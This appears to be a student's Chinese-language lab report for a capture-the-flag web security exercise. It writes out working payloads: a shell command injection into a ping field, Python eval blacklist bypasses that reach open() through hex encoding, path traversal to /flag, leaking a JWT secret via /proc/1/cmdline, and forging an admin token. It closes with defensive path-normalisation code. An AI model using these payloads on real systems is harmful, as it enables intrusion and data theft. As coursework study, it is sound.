# 实验7 实验报告

附注：我的第6次实验邮件于 2023-05-21 提交，不过我邮件写错了，写成了第5次。第1-5次正常。在此麻烦助教了。

## 求解思路

根据助教给出的实验提示就可以得到很多东西（结合一些常见 linux 的使用）

### 超安全的在线 ping 服务

该 python 代码应该是在服务器运行的。打开题目使用 F12 在网络→负载可以发现，该网页把方框内的东西作为 ip 字段进行发送。而服务器执行对应命令。所以可以使用 cat 获取 /flag 的内容：

```text
"ip": "baidu.com -c 1; cat /flag; #"
```

在最底下可以获得 flag

### 超没用的在线计算器

#### Evil Eval

该代码执行一个表达式。既然如此，我们需要执行一个能够输出 flag 的 python 表达式。

```text
print(open('/flag').readlines())
```

输入 expression 即可看到表达式。

#### Blacklist

首先我想到了找找有没有漏网之鱼，可惜，没有。

其次我想到了字符编码绕过，包括转义字符、base64 编码、16 进制编码等等，比如：

```python
string = 'os.system("cat /flag")'
s1 = bytes(string.encode()).hex()
```

输出结果填写进去，不过我发现因为 exec 只能执行一次，所以作罢。

根据提示有个东西叫 `__builtins__`，尝试运行 `dir(__builtins__)` 输出一系列字符串，于是我在想如果能通过下标索引找到 open 函数就会比较好办。

经过一系列查找，我发现虽然没有找到数字下标引用方式（即使有，也可能因为服务器和我电脑的 python 版本不同导致结果不对），但是有类似的东西。有一个东西叫做 `__builtins__.__dict__` ，因为 read 等没被禁，于是只需要解决 open，因此可以尝试把 open 用 dict 解码之后调用该函数。为保险起见，我计划使用字符串的 16 进制编码，因为 bytes 是内置的。

```python
print(bytes('open'.encode()).hex())
# output: 6f70656e
print(bytes.fromhex('6f70656e').decode())
# output: open
```

使用 6f70656e 编码，先在自己电脑尝试：

```python
print(eval("__builtins__.__dict__[bytes.fromhex('6f70656e').decode()]('/etc/passwd').readlines()"))
```

确实输出了 `/etc/passwd` 的内容。把文件名换成 `/flag` 后取中间字符串可以得到 flag：

```text
__builtins__.__dict__[bytes.fromhex('6f70656e').decode()]('/flag').readlines()
```

### 超简陋的 Note 查看器

#### 来去自由

虽然代码非常长，但是可以发现其希望你查看 /app/notes 的东西，需要输入对此的相对路径。但是显然可以用相对路径求解：

```text
/app/notes/../../flag=/flag
```

填写 `../../flag` 即可得到结果。

#### 畅行无阻

首先，我根据 dockerfile 发现 `ENTRYPOINT ["/app/app.py", secret]`，于是用上边的 note 查看了 `/app/app.py`，内容很长就不放这里了。不过分析代码可以发现，如果能把 user 解析出来一个 admin，那么应该比较容易得到这一题的 flag。而根据头部字段，诸如 `/root/cert.pem` 和 `/app/getflag.py` 也许是比较重要的文件，可惜在我能交互的时候就已经被 remove 了。

我的一些思考也不知道对不对：

- 首先，在 `/app/app.py` 的 `methods` 同时包含了 POST 和 GET，不过根据 F12 跟踪打开的网络包发现，默认发送的是 POST，而且只有 note 字段。那么能否通过 GET 绕过上面的 if 限制？（感觉不是很靠谱，不过这种实验往往没有太靠谱的猜测）
- 其次，如果能够突破 docker 限制拿到 `getflag.py`，也就是在 docker 封装时的目录或者在 docker 运行 `app.py` 之前读取，那么也是有可能解出来的——不过这听起来更不靠谱。
- 最后，对于 secret 这个东西，也许是有一定用处的，不过。根据提示，拿到 secret 后需要让 jwt.decode 解析出来 admin，这一部分我不知道怎么做到。那么如何去发送这个 request 是一个问题。当然获取 secret 比较简单，因为 linux 的 pid0 是系统启动前的 idle 进程而 1 是系统创建的用户进程，在这里 1 应该就是运行的 ENTRYPOINT，查看启动命令可以通过 `/proc/1/cmdline` 实现。网页交互也没有阻挡我：

  ![1](img/71.png)

  由此可以看出 secret 是 `17dc03e08732`：

  ```python
  >>> a=bytes.fromhex('17dc03e08732')
  >>> a
  b'\x17\xdc\x03\xe0\x872'
  ```

  并不能继续 encode，那就不管了直接当字符串用，毕竟在代码里也是当字符串的（argv）

  经过观察发现，可能需要自己构造 cookies 发过去，经过各种尝试终于逆向构造了一个 cookies：

  ```python
  import jwt
  user = jwt.encode({'user': 'admin'}, '17dc03e08732', algorithm='HS256')
  cookies = {'user': user}
  ```

  然后尝试发送到服务器上：

  ```python
  url = 'http://ctf.nbs.jonbgua.com:32120'
  req = requests.post(url=url, cookies=cookies)
  print(req)
  print(req.text)
  ```

  状态 403 提示没有正确的 token，把 url 改成 `xxx:32120/?<token>` 也不行，于是尝试找了个之前的题目的 url 移花接木上去，返回 200 并在最下面给出了 flag2，此题结束。

## 思考题

关于路径穿越漏洞：

基本想法就是把路径字符串写成不带 `.` 和 `..` 绝对路径，检查是否在限制目录下面。

转化绝对路径还是比较简单的，比如对 python 有：

```python
path = '/usr/bin/../lib32/./../lib/gcc/x86_64-w64-mingw32/../x86_64-linux-gnu/12'
abspath = os.path.abspath(path=path)
```

abspath 的值为 `/usr/lib/gcc/x86_64-linux-gnu/12`

检查是否位于所求路径下可以使用 `startswith`，不过该方法不检查符号链接及目录是否存在。关于第二个可以用 `os.access`；该方法也适用于其他操作系统。

其他语言如果没有轮子也容易实现，比如 C++：

```c++
using str = std::string;
str abspath(const str& path) {
    str  retval;
    auto spilt = [&]() {
        std::regex       reg("/");
        std::vector<str> elems(
            std::sregex_token_iterator(path.begin(), path.end(), reg, -1),
            std::sregex_token_iterator());
        return elems;
    };
    auto list = spilt();
    std::stack<str> stack; // store path name
    for (auto s : list) {
        if (s.empty() == true) continue;
        if (s == ".") continue;
        if (s == "..") {
            if (stack.size() >= 1) stack.pop();
            else throw std::invalid_argument("path is too short");
        }
        else stack.push(s);
    }
    while (stack.size() > 0) {
        retval = "/" + stack.top() + retval;
        stack.pop();
    }
    return retval;
}
```
